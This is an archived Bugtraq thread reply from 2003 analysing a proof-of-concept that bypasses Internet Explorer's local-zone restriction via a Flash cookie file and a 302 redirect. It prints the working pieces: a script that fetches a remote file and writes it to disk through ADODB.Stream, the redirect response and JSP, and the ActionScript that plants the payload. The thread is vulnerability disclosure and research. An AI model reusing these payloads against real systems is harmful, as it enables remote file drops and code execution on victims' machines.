Bugtraq mailing list archives
Re: Internet Explorer and Opera local zone restriction bypass
From: jelmer <jkuperus () planet nl>
Date: Sat, 25 Oct 2003 03:53:39 +0200
what this does is have a swf file generate a "flash cookie" or .sol file which gets stored to a pseudo known location (you need to know the logged in username) C:\Documents and Settings\Jelmer\Application Data\Macromedia\Flash Player\mlsecurity.com\mlsecurity.sol in this cookie we find <html><script>var x = new ActiveXObject("Microsoft.XMLHTTP"); x.Open("GET", "http://mlsecurity.com/random/ie.txt",0); x.Send();var s = new ActiveXObject("ADODB.Stream"); s.Mode = 3; s.Type = 1; s.Open(); s.Write(x.responseBody); s.SaveToFile("C:\\mlsecurity.txt",2);</script></html> which is the unpatched ADODB.Stream issue so what he's trying to do is get this to run from this sol file by getting internet explorer to render it as an html file in an iframe he tries to acomplish this by setting the response code to 302 (MOVED TEMPORARILY) and making the location header in the reply point to a the locally stored cookie like this : HTTP/1.1 302 Found Date: Fri, 24 Oct 2003 23:32:13 GMT Server: Apache/2.0.46 (Unix) Accept-Ranges: bytes Location: file:///C:/Documents and Settings/jelmer/Application Data/Macromedia/Flash Player/mlsecurity.com/mlsecurity.sol Content-Length: 0 Content-Type: text/html; charset=ISO-8859-1 the following jsp duplicates the behaviour --snip-- <% response.setStatus(HttpServletResponse.SC_MOVED_TEMPORARILY); response.setHeader("Location","file:///C:/Documents and Settings/jelmer/Application Data/Macromedia/Flash Player/mlsecurity.com/mlsecurity.sol"); %> --snip-- then he uses a dynamic iframe to load this page rather than a static one, eg he uses document.write('<iframe src="test.jsp"></iframe>'); rather than <iframe src="test.jsp"></iframe> using the static version has no effect now thats how it works, now about *if* it works. , well when I initially tried it, it did absolutely nothing for me (fully patched IE6) yes it showed the location in the IFRAME as being local in de frame properties, but it didn't render the contents. then I cleared the cache closed IE and all of the sudden it was kind of working, in that it renders the local file on pressing the refresh button. When testing from the local filesystem, calling window.frames[0].location.reload() also did the trick, thus "automating" the attack, You cant use this from the internet though because of cross domain policies, although you could most likely bypass this by using one of liu die yu's unpatched vulnerabilities All in all its still a bit rough and probably needs some work at least from where I am sitting for those curious as to what is in the swf , here's the actionscript code function saveobject(cookiename) { var Daten_array = new Array("Sven", "kelor", "Tschdaeff", "Madokan", "Ming", "Coolflash"); var Datum = new Date(); var Satz_str = _root.teststr_txt.text; _root.createEmptyMovieClip("Test_mc", 0); meinCook_so = SharedObject.getLocal(cookiename, "/"); meinCook_so.data.my_String = Satz_str; meinCook_so.data.my_Array = Daten_array; meinCook_so.data.my_Date = Datum; meinCook_so.data.my_MovieClip = Test_mc; RESULTS = meinCook_so.flush(); if (RESULTS == true) { _root.message_txt.text = "Eingabe Erfolgreich!"; } } function readobject(cookiename) { leseCook_so = SharedObject.getLocal(cookiename, "/"); delete("meinCook_so"); _root.read_txt.htmlText = "<font color=\"#0000FF\">my_String :</font> " + leseCook_so.data.my_String + "\n"; _root.read_txt.htmlText = _root.read_txt.htmlText + ("<font color=\"#0000FF\">my_Array :</font> " + leseCook_so.data.my_Array + "\n"); _root.read_txt.htmlText = _root.read_txt.htmlText + ("<font color=\"#0000FF\">my_Date :</font> " + leseCook_so.data.my_Date + "\n"); _root.read_txt.htmlText = _root.read_txt.htmlText + ("<font color=\"#0000FF\">my_MovieClip :</font> " + leseCook_so.data.my_MovieClip + "\n"); } function deleteShareds(cookiename) { trace(cookiename); delCook_so = SharedObject.getLocal(cookiename, "/"); delete("leseCook_so"); var del_array = new Array("my_String", "my_Array", "my_Date", "my_MovieClip"); var i = 0; delete(del_array[i]); i++; delete("delCook_so"); _root.del_txt.htmlText = "<font color=\"#0000FF\">Objekt :" + delCook_so; _root.del_txt.htmlText = _root.del_txt.htmlText + ("<font color=\"#0000FF\">my_String gelצscht :</font> " + delCook_so.data.my_String + "\n"); _root.del_txt.htmlText = _root.del_txt.htmlText + ("<font color=\"#0000FF\">my_Array gelצscht :</font> " + delCook_so.data.my_Array + "\n"); _root.del_txt.htmlText = _root.del_txt.htmlText + ("<font color=\"#0000FF\">my_Date gelצscht :</font> " + delCook_so.data.my_Date + "\n"); _root.del_txt.htmlText = _root.del_txt.htmlText + ("<font color=\"#0000FF\">my_MovieClip gelצscht :</font> " + delCook_so.data.my_MovieClip + "\n"); } system.useCodepage = true; savedname = this.cookie_txt.text; _root.saveobject(this.cookie_txt.text); stop(); ----- Original Message ----- From: "Jort Slobbe" <jortslobbe () hetnet nl> To: "Mindwarper *" <mindwarper () linuxmail org> Cc: <bugtraq () securityfocus com> Sent: Friday, October 24, 2003 9:02 PM Subject: Re: Internet Explorer and Opera local zone restriction bypass
Mindwarper * wrote:Internet Explorer and Opera local zone restriction bypass. =--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--= ---------------------- Vendor Information: ---------------------- Homepage : http://www.microsoft.com Vendor : informed Mailed advisory: 23/10/03 Vender Response : None yet ---------------------- Affected Versions: ---------------------- All version of IE 6 Possibly 5.x too ---------------------- Description: ---------------------- Microsoft Internet Explorer does not allow local file access by a remote
host by default.
By creating an iframe which points on a specially crafted cgi script
(using the location header
to confuse IE), it is possible to cause IE to execute any local file
through the iframe with local
zone restrictions. This then allows remote arbitrary file execution on
the victim without having
the victim do a thing except load the page. Opera seems to not only be affected by this vulnerability, but it also
allows direct
local file access through iframes without any cgi scripts. Unlike IE
where it is possible
to set activex objects to execute arbitrary files, in Opera it is not.
There may be a way,
but I am currently not aware of any. ---------------------- Exploit: ---------------------- I have created a proof of concept page, but I did not show or explain how
the cgi scripts
nor the flash file work exactly to prevent kiddie abuse. For IE: http://www.mlsecurity.com/ie/ie.htm For Opera: <iframe name="abc" src="file:///C:/"></iframe> ---------------------- Solution: ---------------------- Check Microsoft's website frequently until a new patch comes out. ---------------------- Contact: ---------------------- - Mindwarper - mindwarper () linuxmail org - http://mlsecurity.comIt doesn't work here. I have win2k sp4 with IE6 sp1. I didn't see the weird stuff in the iframe. I have clicked 10 times refresh and the Iframe is as blank as possible ;). When i clicked on the go go go button nothing were created. Maybe i'm not vurnable? Regards Jort
Current thread:
- Internet Explorer and Opera local zone restriction bypass Mindwarper * (Oct 24)
- Re: Internet Explorer and Opera local zone restriction bypass Jort Slobbe (Oct 24)
- Re: Internet Explorer and Opera local zone restriction bypass jelmer (Oct 27)
- Re: Internet Explorer and Opera local zone restriction bypass Andreas Sandblad (Oct 27)
- Re: Internet Explorer and Opera local zone restriction bypass Andreas Sandblad (Oct 27)
- Re: Internet Explorer and Opera local zone restriction bypass jelmer (Oct 28)
- <Possible follow-ups>
- RE: Internet Explorer and Opera local zone restriction bypass Thor Larholm (Oct 27)
- RE: Internet Explorer and Opera local zone restriction bypass Mindwarper * (Oct 27)
- Re: Internet Explorer and Opera local zone restriction bypass Heikki Toivonen (Oct 27)
- Re: Internet Explorer and Opera local zone restriction bypass Mohsen Hariri (Oct 27)
- Re: Internet Explorer and Opera local zone restriction bypass Paul Szabo (Oct 27)
- RE: Internet Explorer and Opera local zone restriction bypass Thor Larholm (Oct 28)
- Re: Internet Explorer and Opera local zone restriction bypass Bipin Gautam hUNT3R (Oct 28)
(Thread continues...)
- Re: Internet Explorer and Opera local zone restriction bypass Jort Slobbe (Oct 24)